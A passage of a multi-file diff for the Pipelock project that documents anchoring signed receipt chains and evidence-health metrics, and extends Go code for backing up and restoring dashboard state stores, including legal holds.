+  --key /etc/pipelock/keys/flight-recorder-signing.key.pub
+```
+
+Exit code 0 means the analysis ran and the chain was not classified BROKEN;
+LIMITED and UNVERIFIED are successful analyses. Exit code 1 means broken
+completeness evidence, an unpinned non-empty chain without
+`--allow-unpinned`, or another verifier failure.
 
 ### Chains that rotated the signing key
 
@@ -251,6 +274,60 @@ An empty evidence file — zero receipts — fails with a non-zero exit code
 rather than silently printing a valid-looking root, so scripts can trust
 an exit-0 status to mean "receipts were present and the chain verified."
 
+## Anchoring receipts
+
+`pipelock anchor receipts` verifies a receipt chain with pinned signer keys,
+writes the verified chain head to an anchor backend, and emits an anchor bundle
+for later offline verification.
+
+The local backend is deterministic test/development plumbing, not an
+operator-independent witness:
+
+```bash
+pipelock anchor receipts /var/lib/pipelock/evidence \
+  --dir \
+  --session agent-a \
+  --key /etc/pipelock/keys/flight-recorder-signing.key.pub \
+  --backend local \
+  --local-log /var/lib/pipelock/anchors/local-log.jsonl \
+  --out /var/lib/pipelock/evidence/agent-a.anchor.json
+```
+
+The Rekor backend submits checkpoint material to a remote transparency log. It
+has no public default URL: name the log explicitly and acknowledge the remote
+submission. The hashedrekord data hash defaults to `sha256`; set
+`--rekor-hash-algorithm sha512` only when your Rekor deployment requires it.
+
+```bash
+pipelock anchor receipts /var/lib/pipelock/evidence \
+  --dir \
+  --session agent-a \
+  --key /etc/pipelock/keys/flight-recorder-signing.key.pub \
+  --backend rekor \
+  --rekor-url https://rekor.vendor.example \
+  --rekor-key /etc/pipelock/keys/rekor-checkpoint.key \
+  --rekor-hash-algorithm sha256 \
+  --yes-send-to-remote-log \
+  --out /var/lib/pipelock/evidence/agent-a.rekor-anchor.json
+```
+
+Offline independent verification requires the receipt signer key and a pinned
+Rekor log public key. Without `--rekor-log-key`, Rekor inclusion material is not
+trusted.
+
+```bash
+pipelock-verifier independent /var/lib/pipelock/evidence \
+  --dir \
+  --session agent-a \
+  --bundle /var/lib/pipelock/evidence/agent-a.rekor-anchor.json \
+  --key /etc/pipelock/keys/flight-recorder-signing.key.pub \
+  --rekor-log-key /etc/pipelock/keys/rekor-log.pub
+```
+
+Honest limit: anchoring narrows post-anchor omission and tampering windows, but
+it does not prove real-time truth by whoever held the receipt signing key and
+does not prove traffic outside the mediated boundary did not happen.
+
 ## How the chain works
 
 Each receipt contains:
@@ -268,7 +345,7 @@ Each receipt contains:
 The chain links receipts via `chain_prev_hash`:
 
 ```
-Receipt 0:  chain_seq=0, chain_prev_hash="genesis"
+Receipt 0:  chain_seq=0, chain_prev_hash="genesis" (legacy) or "g1:<sha256>"
 Receipt 1:  chain_seq=1, chain_prev_hash=sha256(receipt_0)
 Receipt 2:  chain_seq=2, chain_prev_hash=sha256(receipt_1)
 ...

--- a/docs/metrics.md
+++ b/docs/metrics.md
@@ -119,6 +119,31 @@ investigation.
 | `pipelock_kill_switch_denials_total` | counter | `transport`, `endpoint` | Requests denied by the kill switch. |
 | `pipelock_chain_detections_total` | counter | `pattern`, `severity`, `action` | Tool call chain pattern detections. |
 
+## Evidence Health Metrics
+
+These metrics summarize the live evidence pipeline. They are observability only:
+they do not make traffic decisions, and a missing value means the evidence
+health sampler is not measuring that fact in the current runtime.
+
+| Metric | Type | Labels | Description |
+|--------|------|--------|-------------|
+| `pipelock_evidence_current_ael` | gauge | (none) | Current evidence assurance level, 0 through 4. The level is a minimum over enabled requirements and must not be read as a green completeness claim. |
+| `pipelock_evidence_ael_requirement_ok` | gauge | `requirement` | One when a bounded evidence requirement is currently satisfied. Requirement labels are `recorder_enabled`, `emitter_healthy`, `durability_gate`, `heartbeats`, `anchoring_fresh`, `cpc_active`, and `selfaudit_ok`. |
+| `pipelock_evidence_chain_head_seq` | gauge | (none) | Last emitted in-memory receipt sequence, omitted when evidence health is not measured. |
+| `pipelock_evidence_chain_head_age_seconds` | gauge | (none) | Seconds since the last durable chain entry, omitted when evidence health is not measured. |
+| `pipelock_evidence_heartbeat_interval_seconds` | gauge | (none) | Configured receipt heartbeat interval in seconds; absent from JSON stats until heartbeats are enabled. |
+| `pipelock_evidence_anchor_lag_receipts` | gauge | (none) | Receipts between the live chain head and the latest accepted anchor-state marker. |
+| `pipelock_evidence_last_anchor_timestamp_seconds` | gauge | (none) | Unix timestamp of the latest accepted local anchor-state marker, or zero when never anchored. |
+| `pipelock_evidence_anchored_final_seq` | gauge | (none) | Final receipt sequence covered by the latest accepted local anchor-state marker. |
+| `pipelock_evidence_sequence_gaps_total` | counter | `source` | Observed sequence gaps by bounded source. Source labels are `resume`, `self_audit`, and `unknown`. |
+| `pipelock_evidence_fsync_errors_total` | counter | `gated` | Per-action durability confirmation failures. `gated=true` means fail-closed receipt gating was active. |
+| `pipelock_evidence_selfaudit_ok` | gauge | (none) | One while evidence self-audit checks pass; latches to zero after a failure in the process. |
+| `pipelock_evidence_selfaudit_failures_total` | counter | `check` | Evidence self-audit failures by bounded check label: `durability_invariant`, `tail_divergence`, or `sampler_error`. |
+
+The `/stats` endpoint also includes a nullable `evidence_health` object with
+the same chain-head, sequence-gap, fsync, anchor, durability, and requirement
+state. Treat `null` as "not measured," not as healthy.
+
 ## Session Profiling Metrics
 
 Pipelock tracks per-session behavioral profiles. Sessions that deviate

--- a/docs/metrics.md
+++ b/docs/metrics.md
@@ -338,7 +338,8 @@ curl http://localhost:8888/stats | jq .
   "agents": {
     "claude-code": {"allowed": 35, "blocked": 1, "tunnels": 1200},
     "cursor": {"allowed": 5, "blocked": 1, "tunnels": 323}
-  }
+  },
+  "evidence_health": null
 }
 ```
 

--- a/docs/security/clock-skew-inventory.md
+++ b/docs/security/clock-skew-inventory.md
@@ -3,9 +3,9 @@ Copyright 2026 Josh Waldrep
 SPDX-License-Identifier: Apache-2.0
 -->
 
-# v3.0.0 Clock-Skew Inventory
+# v3.1.0 Clock-Skew Inventory
 
-This inventory records the v3.0.0 sweep for the class where one host stamps a
+This inventory records the v3.1.0 sweep for the class where one host stamps a
 time and another host validates it with its own clock. The rule used here:
 
 - Cross-host `not_before` / created-time gates may tolerate bounded positive
@@ -43,7 +43,7 @@ Run these from the repository root:
 go test -tags enterprise -count=1 ./enterprise/conductor ./enterprise/conductor/controlplane ./enterprise/conductor/emergency ./enterprise/conductor/policysync
 ```
 
-The conductor package includes the v3.0.0 regression coverage for bounded
-`not_before` skew while keeping expiry strict. The control-plane, emergency, and
+The conductor package includes regression coverage for bounded `not_before`
+skew while keeping expiry strict. The control-plane, emergency, and
 poller packages exercise the same validity helpers through handler/store/poller
 paths.

--- a/docs/security/self-update-signing-custody.md
+++ b/docs/security/self-update-signing-custody.md
@@ -21,8 +21,8 @@ referenced by the release workflow.
    then transfer it to the offline signing machine on removable media. The signing
    machine stays air-gapped and never connects to the network.
 
-2. Unlock the offline release signing key from USB `PIPELOCK-KEYS2`, using the
-   same custody handling as the license signer.
+2. Unlock the offline release signing key from the designated removable media,
+   using the same custody handling as the license signer.
 
 3. Sign the manifest:
 
@@ -43,7 +43,7 @@ unset PIPELOCK_RELEASE_PRIVATE_KEY_HEX
 5. Confirm the release contains both files:
 
 ```bash
-gh release view v3.0.0 --json assets --jq '.assets[].name' | sort
+gh release view v3.1.0 --json assets --jq '.assets[].name' | sort
 ```
 
 The client verification path is unchanged: `pipelock update` downloads

--- a/enterprise/cli/dashboard_operability.go
+++ b/enterprise/cli/dashboard_operability.go
@@ -6,6 +6,7 @@ package entcli
 
 import (
 	"fmt"
+	"strings"
 
 	"github.com/spf13/cobra"
 
@@ -13,28 +14,45 @@ import (
 )
 
 func dashboardBackupCmd() *cobra.Command {
-	var stateDir, output string
+	var stateDir, output, exemptionStore, deliveryInbox, legalHoldStore string
 	cmd := &cobra.Command{
 		Use:   "backup",
 		Short: "Back up non-reconstructible dashboard state",
 		Args:  cobra.NoArgs,
 		RunE: func(cmd *cobra.Command, _ []string) error {
-			if err := dashboard.BackupState(stateDir, output); err != nil {
+			result, err := dashboard.BackupStateWithOptions(dashboard.BackupOptions{
+				StateDir:           stateDir,
+				ArchivePath:        output,
+				ExemptionStorePath: exemptionStore,
+				DeliveryInboxPath:  deliveryInbox,
+				LegalHoldStorePath: legalHoldStore,
+			})
+			if err != nil {
 				return err
 			}
-			_, _ = fmt.Fprintf(cmd.OutOrStdout(), "dashboard durable state backed up to %s\n", output)
+			_, _ = fmt.Fprintf(cmd.OutOrStdout(), "dashboard durable state backed up to %s (captured stores: %s)\n",
+				output, formatDashboardStoreList(result.CapturedStores))
+			if len(result.MissingStores) > 0 {
+				_, _ = fmt.Fprintf(cmd.OutOrStdout(), "dashboard durable state stores not present: %s\n", formatDashboardStoreList(result.MissingStores))
+			}
+			if strings.TrimSpace(legalHoldStore) == "" {
+				_, _ = fmt.Fprintln(cmd.OutOrStdout(), "legal holds not captured: --legal-hold-store was not set")
+			}
 			return nil
 		},
 	}
 	cmd.Flags().StringVar(&stateDir, "state-dir", "", "dashboard state directory containing durable JSON stores")
 	cmd.Flags().StringVar(&output, "output", "", "output tar archive (created with mode 0600)")
+	cmd.Flags().StringVar(&exemptionStore, "exemption-store", "", "optional exemption lifecycle store file; defaults to <state-dir>/exemptions.json")
+	cmd.Flags().StringVar(&deliveryInbox, "delivery-inbox", "", "optional alert delivery inbox file; defaults to <state-dir>/delivery-inbox.json")
+	cmd.Flags().StringVar(&legalHoldStore, "legal-hold-store", "", "optional legal-hold metadata store file to include")
 	_ = cmd.MarkFlagRequired("state-dir")
 	_ = cmd.MarkFlagRequired("output")
 	return cmd
 }
 
 func dashboardRestoreCmd() *cobra.Command {
-	var stateDir, input string
+	var stateDir, input, exemptionStore, deliveryInbox, legalHoldStore string
 	cmd := &cobra.Command{
 		Use:   "restore",
 		Short: "Validate and restore dashboard durable state (per-file atomic write, rollback on failure)",
@@ -46,18 +64,36 @@ single cross-file transaction: a process crash between file writes can leave a m
 generation on disk. Re-run restore to converge.`,
 		Args: cobra.NoArgs,
 		RunE: func(cmd *cobra.Command, _ []string) error {
-			if err := dashboard.RestoreState(stateDir, input); err != nil {
+			result, err := dashboard.RestoreStateWithOptions(dashboard.RestoreOptions{
+				StateDir:           stateDir,
+				ArchivePath:        input,
+				ExemptionStorePath: exemptionStore,
+				DeliveryInboxPath:  deliveryInbox,
+				LegalHoldStorePath: legalHoldStore,
+			})
+			if err != nil {
 				return err
 			}
-			_, _ = fmt.Fprintf(cmd.OutOrStdout(), "dashboard durable state restored from %s\n", input)
+			_, _ = fmt.Fprintf(cmd.OutOrStdout(), "dashboard durable state restored from %s (restored stores: %s)\n",
+				input, formatDashboardStoreList(result.RestoredStores))
 			return nil
 		},
 	}
 	cmd.Flags().StringVar(&stateDir, "state-dir", "", "dashboard state directory to restore")
 	cmd.Flags().StringVar(&input, "input", "", "validated dashboard backup tar archive")
+	cmd.Flags().StringVar(&exemptionStore, "exemption-store", "", "optional exemption lifecycle store file; defaults to <state-dir>/exemptions.json")
+	cmd.Flags().StringVar(&deliveryInbox, "delivery-inbox", "", "optional alert delivery inbox file; defaults to <state-dir>/delivery-inbox.json")
+	cmd.Flags().StringVar(&legalHoldStore, "legal-hold-store", "", "optional legal-hold metadata store file to restore")
 	_ = cmd.MarkFlagRequired("state-dir")
 	_ = cmd.MarkFlagRequired("input")
 	return cmd
+}
+
+func formatDashboardStoreList(stores []string) string {
+	if len(stores) == 0 {
+		return "none"
+	}
+	return strings.Join(stores, ", ")
 }
 
 func dashboardRebuildReadModelCmd() *cobra.Command {

--- a/enterprise/cli/dashboard_operability_test.go
+++ b/enterprise/cli/dashboard_operability_test.go
@@ -43,6 +43,27 @@ func TestDashboardBackupRestoreCommands(t *testing.T) {
 	}
 }
 
+func TestDashboardBackupCommandReportsNoCapturedStores(t *testing.T) {
+	stateDir := t.TempDir()
+	archive := filepath.Join(t.TempDir(), "backup.tar")
+	cmd := DashboardCmd()
+	var output bytes.Buffer
+	cmd.SetOut(&output)
+	cmd.SetArgs([]string{"backup", "--state-dir", stateDir, "--output", archive})
+	if err := cmd.Execute(); err != nil {
+		t.Fatalf("backup command: %v", err)
+	}
+	for _, want := range []string{
+		"captured stores: none",
+		"dashboard durable state stores not present: exemptions, delivery-inbox",
+		"legal holds not captured: --legal-hold-store was not set",
+	} {
+		if !strings.Contains(output.String(), want) {
+			t.Fatalf("backup output missing %q: %q", want, output.String())
+		}
+	}
+}
+
 func TestDashboardRebuildCommand_MissingSourceIsLoud(t *testing.T) {
 	cmd := DashboardCmd()
 	cmd.SetArgs([]string{"rebuild-read-model", "--receipt-dir", t.TempDir(), "--output", filepath.Join(t.TempDir(), "index.json")})

--- a/enterprise/dashboard/agents.tmpl.html
+++ b/enterprise/dashboard/agents.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Evidence - Agents</title>
   <style>
     :root {

--- a/enterprise/dashboard/backup.go
+++ b/enterprise/dashboard/backup.go
@@ -271,11 +271,7 @@ func readBackupStateStoreFile(store durableStateStore) ([]byte, error) {
 	}
 	defer func() { _ = file.Close() }()
 	switch store.archiveName {
-	case ExemptionStateFile:
-		if err := requireOwnerOnlyDashboardFile(file, info, store.label); err != nil {
-			return nil, err
-		}
-	case LegalHoldStateFile:
+	case ExemptionStateFile, LegalHoldStateFile:
 		if err := requireOwnerOnlyDashboardFile(file, info, store.label); err != nil {
 			return nil, err
 		}

--- a/enterprise/dashboard/backup.go
+++ b/enterprise/dashboard/backup.go
@@ -16,6 +16,7 @@ import (
 	"os"
 	"path/filepath"
 	"sort"
+	"strings"
 	"sync"
 
 	"github.com/luckyPipewrench/pipelock/internal/atomicfile"
@@ -25,6 +26,7 @@ import (
 const (
 	ExemptionStateFile     = "exemptions.json"
 	DeliveryInboxStateFile = "delivery-inbox.json"
+	LegalHoldStateFile     = "legal-holds.json"
 	backupManifestName     = "manifest.json"
 	backupFormatVersion    = 1
 	maxBackupFileSize      = 64 << 20
@@ -34,7 +36,14 @@ const (
 var durableStateFiles = map[string]struct{}{
 	ExemptionStateFile:     {},
 	DeliveryInboxStateFile: {},
+	LegalHoldStateFile:     {},
 }
+
+const (
+	backupStoreExemptions = "exemptions"
+	backupStoreDelivery   = "delivery-inbox"
+	backupStoreLegalHolds = "legal-holds"
+)
 
 type backupManifest struct {
 	Version int                  `json:"version"`
@@ -42,9 +51,50 @@ type backupManifest struct {
 }
 
 type backupManifestFile struct {
+	Store  string `json:"store,omitempty"`
 	Name   string `json:"name"`
 	SHA256 string `json:"sha256"`
 	Size   int64  `json:"size"`
+}
+
+// BackupOptions selects the operator-configured dashboard state stores to
+// archive. Empty exemption and delivery paths default under StateDir; an empty
+// legal-hold path means no legal-hold store is configured for this backup.
+type BackupOptions struct {
+	StateDir           string
+	ArchivePath        string
+	ExemptionStorePath string
+	DeliveryInboxPath  string
+	LegalHoldStorePath string
+}
+
+// RestoreOptions selects the operator-configured dashboard state store targets.
+// Empty exemption and delivery paths default under StateDir. A backup containing
+// legal holds requires LegalHoldStorePath so restore cannot silently drop them.
+type RestoreOptions struct {
+	StateDir           string
+	ArchivePath        string
+	ExemptionStorePath string
+	DeliveryInboxPath  string
+	LegalHoldStorePath string
+}
+
+type BackupResult struct {
+	CapturedStores []string
+	MissingStores  []string
+}
+
+type RestoreResult struct {
+	RestoredStores []string
+	RemovedStores  []string
+}
+
+type durableStateStore struct {
+	store       string
+	archiveName string
+	path        string
+	label       string
+	pathLock    func(string) *sync.Mutex
 }
 
 var (
@@ -65,85 +115,201 @@ func stateDirLock(path string) *sync.Mutex {
 // non-reconstructible dashboard state. Recorder evidence and read-model
 // indexes are intentionally excluded.
 func BackupState(stateDir, archivePath string) error {
-	stateDir = filepath.Clean(stateDir)
-	archivePath = filepath.Clean(archivePath)
-	if err := rejectProtectedArchivePath(stateDir, archivePath); err != nil {
-		return err
+	_, err := BackupStateWithOptions(BackupOptions{StateDir: stateDir, ArchivePath: archivePath})
+	return err
+}
+
+// BackupStateWithOptions writes a deterministic tar archive containing the
+// configured non-reconstructible dashboard state stores.
+func BackupStateWithOptions(opts BackupOptions) (BackupResult, error) {
+	stateDir := filepath.Clean(opts.StateDir)
+	archivePath := filepath.Clean(opts.ArchivePath)
+	stores := backupStoresFromOptions(stateDir, opts.ExemptionStorePath, opts.DeliveryInboxPath, opts.LegalHoldStorePath)
+	if err := rejectDuplicateStorePaths(stores); err != nil {
+		return BackupResult{}, err
+	}
+	if err := rejectProtectedArchivePath(stateDir, archivePath, stores); err != nil {
+		return BackupResult{}, err
 	}
 	mu := stateDirLock(stateDir)
 	mu.Lock()
 	defer mu.Unlock()
-	releaseFiles, err := lockDurableStateFiles(stateDir)
+	releaseFiles, err := lockDurableStateStores(stores)
 	if err != nil {
-		return err
+		return BackupResult{}, err
 	}
 	defer releaseFiles()
 
-	names := make([]string, 0, len(durableStateFiles))
-	for name := range durableStateFiles {
-		names = append(names, name)
-	}
-	sort.Strings(names)
-	files := make(map[string][]byte, len(names))
+	files := make(map[string][]byte, len(stores))
 	manifest := backupManifest{Version: backupFormatVersion}
-	for _, name := range names {
-		data, err := os.ReadFile(filepath.Clean(filepath.Join(stateDir, name)))
-		if errors.Is(err, os.ErrNotExist) {
+	result := BackupResult{}
+	for _, store := range stores {
+		data, exists, err := readDurableStateStore(store)
+		if err != nil {
+			return BackupResult{}, fmt.Errorf("backup dashboard state %s: %w", store.archiveName, err)
+		}
+		if !exists {
+			result.MissingStores = append(result.MissingStores, store.store)
 			continue
 		}
-		if err != nil {
-			return fmt.Errorf("backup dashboard state %s: %w", name, err)
-		}
 		if len(data) > maxBackupFileSize {
-			return fmt.Errorf("backup dashboard state %s: exceeds %d-byte limit", name, maxBackupFileSize)
+			return BackupResult{}, fmt.Errorf("backup dashboard state %s: exceeds %d-byte limit", store.archiveName, maxBackupFileSize)
 		}
-		if err := validateStateFile(name, data); err != nil {
-			return fmt.Errorf("backup dashboard state %s: %w", name, err)
+		if err := validateStateFile(store.archiveName, data); err != nil {
+			return BackupResult{}, fmt.Errorf("backup dashboard state %s: %w", store.archiveName, err)
 		}
 		sum := sha256.Sum256(data)
-		files[name] = data
-		manifest.Files = append(manifest.Files, backupManifestFile{Name: name, SHA256: hex.EncodeToString(sum[:]), Size: int64(len(data))})
+		files[store.archiveName] = data
+		result.CapturedStores = append(result.CapturedStores, store.store)
+		manifest.Files = append(manifest.Files, backupManifestFile{
+			Store:  store.store,
+			Name:   store.archiveName,
+			SHA256: hex.EncodeToString(sum[:]),
+			Size:   int64(len(data)),
+		})
 	}
 	manifestData, err := json.MarshalIndent(manifest, "", "  ")
 	if err != nil {
-		return fmt.Errorf("backup dashboard state manifest: %w", err)
+		return BackupResult{}, fmt.Errorf("backup dashboard state manifest: %w", err)
 	}
 
 	var archive bytes.Buffer
 	tw := tar.NewWriter(&archive)
 	if err := writeTarFile(tw, backupManifestName, manifestData); err != nil {
-		return err
+		return BackupResult{}, err
 	}
 	for _, entry := range manifest.Files {
 		if err := writeTarFile(tw, entry.Name, files[entry.Name]); err != nil {
-			return err
+			return BackupResult{}, err
 		}
 	}
 	if err := tw.Close(); err != nil {
-		return fmt.Errorf("close dashboard backup archive: %w", err)
+		return BackupResult{}, fmt.Errorf("close dashboard backup archive: %w", err)
 	}
 	if err := os.MkdirAll(filepath.Dir(archivePath), 0o750); err != nil {
-		return fmt.Errorf("create dashboard backup directory: %w", err)
+		return BackupResult{}, fmt.Errorf("create dashboard backup directory: %w", err)
 	}
 	if err := atomicfile.Write(archivePath, archive.Bytes(), 0o600); err != nil {
-		return fmt.Errorf("write dashboard backup: %w", err)
+		return BackupResult{}, fmt.Errorf("write dashboard backup: %w", err)
+	}
+	return result, nil
+}
+
+func backupStoresFromOptions(stateDir, exemptionStorePath, deliveryInboxPath, legalHoldStorePath string) []durableStateStore {
+	stores := []durableStateStore{
+		{
+			store:       backupStoreExemptions,
+			archiveName: ExemptionStateFile,
+			path:        defaultOrConfiguredPath(stateDir, ExemptionStateFile, exemptionStorePath),
+			label:       "exemption store",
+			pathLock:    exemptionStorePathLock,
+		},
+		{
+			store:       backupStoreDelivery,
+			archiveName: DeliveryInboxStateFile,
+			path:        defaultOrConfiguredPath(stateDir, DeliveryInboxStateFile, deliveryInboxPath),
+			label:       "delivery inbox",
+			pathLock:    exemptionStorePathLock,
+		},
+	}
+	if strings.TrimSpace(legalHoldStorePath) != "" {
+		stores = append(stores, durableStateStore{
+			store:       backupStoreLegalHolds,
+			archiveName: LegalHoldStateFile,
+			path:        filepath.Clean(legalHoldStorePath),
+			label:       "legal hold store",
+			pathLock:    legalHoldStorePathLock,
+		})
+	}
+	return stores
+}
+
+func restoreStoresFromOptions(stateDir, exemptionStorePath, deliveryInboxPath, legalHoldStorePath string) []durableStateStore {
+	return backupStoresFromOptions(stateDir, exemptionStorePath, deliveryInboxPath, legalHoldStorePath)
+}
+
+func defaultOrConfiguredPath(stateDir, name, configured string) string {
+	if strings.TrimSpace(configured) != "" {
+		return filepath.Clean(configured)
+	}
+	return filepath.Join(stateDir, name)
+}
+
+func rejectDuplicateStorePaths(stores []durableStateStore) error {
+	seen := make(map[string]string, len(stores))
+	for _, store := range stores {
+		key, err := canonicalPath(store.path)
+		if errors.Is(err, os.ErrNotExist) {
+			key, err = filepath.Abs(filepath.Clean(store.path))
+		}
+		if err != nil {
+			return fmt.Errorf("resolve dashboard state path %s: %w", store.archiveName, err)
+		}
+		if prior, duplicate := seen[key]; duplicate {
+			return fmt.Errorf("dashboard state stores %s and %s resolve to the same path", prior, store.archiveName)
+		}
+		seen[key] = store.archiveName
 	}
 	return nil
 }
 
-func rejectProtectedArchivePath(stateDir, archivePath string) error {
-	canonicalDir, err := canonicalPath(stateDir)
+func readDurableStateStore(store durableStateStore) ([]byte, bool, error) {
+	data, err := readBackupStateStoreFile(store)
+	if errors.Is(err, os.ErrNotExist) {
+		return nil, false, nil
+	}
 	if err != nil {
+		return nil, false, err
+	}
+	return data, true, nil
+}
+
+func readBackupStateStoreFile(store durableStateStore) ([]byte, error) {
+	file, info, err := openRegularDashboardFile(store.path, store.label)
+	if err != nil {
+		return nil, err
+	}
+	defer func() { _ = file.Close() }()
+	switch store.archiveName {
+	case ExemptionStateFile:
+		if err := requireOwnerOnlyDashboardFile(file, info, store.label); err != nil {
+			return nil, err
+		}
+	case LegalHoldStateFile:
+		if err := requireOwnerOnlyDashboardFile(file, info, store.label); err != nil {
+			return nil, err
+		}
+	case DeliveryInboxStateFile:
+	default:
+		return nil, fmt.Errorf("unknown dashboard state store %q", store.archiveName)
+	}
+	data, err := io.ReadAll(io.LimitReader(file, maxBackupFileSize+1))
+	if err != nil {
+		return nil, err
+	}
+	if len(data) > maxBackupFileSize {
+		return nil, fmt.Errorf("exceeds %d-byte limit", maxBackupFileSize)
+	}
+	return data, nil
+}
+
+func rejectProtectedArchivePath(stateDir, archivePath string, stores []durableStateStore) error {
+	if _, err := canonicalPath(stateDir); err != nil {
 		return fmt.Errorf("resolve dashboard state directory: %w", err)
 	}
 	canonicalArchive, err := canonicalPath(archivePath)
 	if err != nil {
 		return fmt.Errorf("resolve dashboard backup path: %w", err)
 	}
-	for name := range durableStateFiles {
-		for _, protected := range []string{name, name + ".lock"} {
-			if canonicalArchive == filepath.Join(canonicalDir, protected) {
-				return fmt.Errorf("dashboard backup path must not overwrite protected state file %s", protected)
+	for _, store := range stores {
+		protectedPath := store.path
+		for _, protected := range []string{protectedPath, protectedPath + ".lock"} {
+			canonicalProtected, protectedErr := canonicalPath(protected)
+			if protectedErr != nil {
+				continue
+			}
+			if canonicalArchive == canonicalProtected {
+				return fmt.Errorf("dashboard backup path must not overwrite protected state file %s", filepath.Base(protected))
 			}
 		}
 	}
@@ -194,64 +360,95 @@ func writeTarFile(tw *tar.Writer, name string, data []byte) error {
 // validation fails, existing state is untouched. Commit-time errors trigger a
 // rollback from in-memory originals before an error is returned.
 func RestoreState(stateDir, archivePath string) error {
-	data, err := readBackupArchive(archivePath)
+	_, err := RestoreStateWithOptions(RestoreOptions{StateDir: stateDir, ArchivePath: archivePath})
+	return err
+}
+
+// RestoreStateWithOptions validates the complete archive before replacing any
+// configured state store. Commit-time errors trigger rollback from in-memory
+// originals before an error is returned.
+func RestoreStateWithOptions(opts RestoreOptions) (RestoreResult, error) {
+	data, err := readBackupArchive(opts.ArchivePath)
 	if err != nil {
-		return fmt.Errorf("read dashboard backup: %w", err)
+		return RestoreResult{}, fmt.Errorf("read dashboard backup: %w", err)
 	}
 	restored, err := decodeBackup(data)
 	if err != nil {
-		return err
+		return RestoreResult{}, err
 	}
-	stateDir = filepath.Clean(stateDir)
+	stateDir := filepath.Clean(opts.StateDir)
+	stores := restoreStoresFromOptions(stateDir, opts.ExemptionStorePath, opts.DeliveryInboxPath, opts.LegalHoldStorePath)
+	if err := rejectDuplicateStorePaths(stores); err != nil {
+		return RestoreResult{}, err
+	}
+	storesByArchive := make(map[string]durableStateStore, len(stores))
+	for _, store := range stores {
+		storesByArchive[store.archiveName] = store
+	}
+	for name := range restored {
+		if _, configured := storesByArchive[name]; !configured {
+			return RestoreResult{}, fmt.Errorf("restore dashboard state %s: target store path is not configured", name)
+		}
+	}
 	if err := os.MkdirAll(stateDir, 0o750); err != nil {
-		return fmt.Errorf("create dashboard state directory: %w", err)
+		return RestoreResult{}, fmt.Errorf("create dashboard state directory: %w", err)
+	}
+	for _, store := range stores {
+		if err := os.MkdirAll(filepath.Dir(store.path), 0o750); err != nil {
+			return RestoreResult{}, fmt.Errorf("create dashboard state directory for %s: %w", store.archiveName, err)
+		}
 	}
 	mu := stateDirLock(stateDir)
 	mu.Lock()
 	defer mu.Unlock()
-	releaseFiles, err := lockDurableStateFiles(stateDir)
+	releaseFiles, err := lockDurableStateStores(stores)
 	if err != nil {
-		return err
+		return RestoreResult{}, err
 	}
 	defer releaseFiles()
 
-	originals := make(map[string][]byte, len(durableStateFiles))
-	missing := make(map[string]bool, len(durableStateFiles))
-	for name := range durableStateFiles {
-		prior, readErr := os.ReadFile(filepath.Clean(filepath.Join(stateDir, name)))
+	originals := make(map[string][]byte, len(stores))
+	missing := make(map[string]bool, len(stores))
+	for _, store := range stores {
+		prior, readErr := os.ReadFile(filepath.Clean(store.path))
 		if errors.Is(readErr, os.ErrNotExist) {
-			missing[name] = true
+			missing[store.archiveName] = true
 			continue
 		}
 		if readErr != nil {
-			return fmt.Errorf("snapshot existing dashboard state %s: %w", name, readErr)
+			return RestoreResult{}, fmt.Errorf("snapshot existing dashboard state %s: %w", store.archiveName, readErr)
 		}
-		originals[name] = prior
+		originals[store.archiveName] = prior
 	}
 
-	names := make([]string, 0, len(durableStateFiles))
-	for name := range durableStateFiles {
-		names = append(names, name)
-	}
-	sort.Strings(names)
-	for _, name := range names {
-		path := filepath.Join(stateDir, name)
-		file, exists := restored[name]
+	stores = sortedDurableStateStores(stores)
+	result := RestoreResult{}
+	for _, store := range stores {
+		file, exists := restored[store.archiveName]
 		if exists {
-			err = writeDashboardStateFile(path, file, 0o600)
+			if err := os.MkdirAll(filepath.Dir(store.path), 0o750); err != nil {
+				return RestoreResult{}, fmt.Errorf("create dashboard state directory for %s: %w", store.archiveName, err)
+			}
+			err = writeDashboardStateFile(store.path, file, 0o600)
+			if err == nil {
+				result.RestoredStores = append(result.RestoredStores, store.store)
+			}
 		} else {
-			err = os.Remove(path)
+			err = os.Remove(store.path)
 			if errors.Is(err, os.ErrNotExist) {
 				err = nil
+			}
+			if err == nil {
+				result.RemovedStores = append(result.RemovedStores, store.store)
 			}
 		}
 		if err == nil {
 			continue
 		}
-		rollbackErr := rollbackState(stateDir, names, originals, missing)
-		return fmt.Errorf("restore dashboard state %s: %w", name, errors.Join(err, rollbackErr))
+		rollbackErr := rollbackState(stores, originals, missing)
+		return RestoreResult{}, fmt.Errorf("restore dashboard state %s: %w", store.archiveName, errors.Join(err, rollbackErr))
 	}
-	return nil
+	return result, nil
 }
 
 func readBackupArchive(path string) ([]byte, error) {
@@ -270,50 +467,55 @@ func readBackupArchive(path string) ([]byte, error) {
 	return data, nil
 }
 
-func lockDurableStateFiles(stateDir string) (func(), error) {
-	names := make([]string, 0, len(durableStateFiles))
-	for name := range durableStateFiles {
-		names = append(names, name)
-	}
-	sort.Strings(names)
+func lockDurableStateStores(stores []durableStateStore) (func(), error) {
+	stores = sortedDurableStateStores(stores)
 	type heldLock struct {
 		pathMu *sync.Mutex
 		file   *exemptionStoreFileLock
 	}
-	held := make([]heldLock, 0, len(names))
+	held := make([]heldLock, 0, len(stores))
 	release := func() {
 		for index := len(held) - 1; index >= 0; index-- {
 			_ = held[index].file.Close()
 			held[index].pathMu.Unlock()
 		}
 	}
-	for _, name := range names {
-		path := filepath.Join(stateDir, name)
-		pathMu := exemptionStorePathLock(path)
+	for _, store := range stores {
+		pathMu := store.pathLock(store.path)
 		pathMu.Lock()
-		fileLock, err := acquireExemptionStoreFileLock(path + ".lock")
+		fileLock, err := acquireExemptionStoreFileLock(store.path + ".lock")
 		if err != nil {
 			pathMu.Unlock()
 			release()
-			return nil, fmt.Errorf("lock dashboard state %s: %w", name, err)
+			return nil, fmt.Errorf("lock dashboard state %s: %w", store.archiveName, err)
 		}
 		held = append(held, heldLock{pathMu: pathMu, file: fileLock})
 	}
 	return release, nil
 }
 
-func rollbackState(stateDir string, names []string, originals map[string][]byte, missing map[string]bool) error {
+func sortedDurableStateStores(stores []durableStateStore) []durableStateStore {
+	out := append([]durableStateStore(nil), stores...)
+	sort.Slice(out, func(i, j int) bool {
+		if out[i].path == out[j].path {
+			return out[i].archiveName < out[j].archiveName
+		}
+		return out[i].path < out[j].path
+	})
+	return out
+}
+
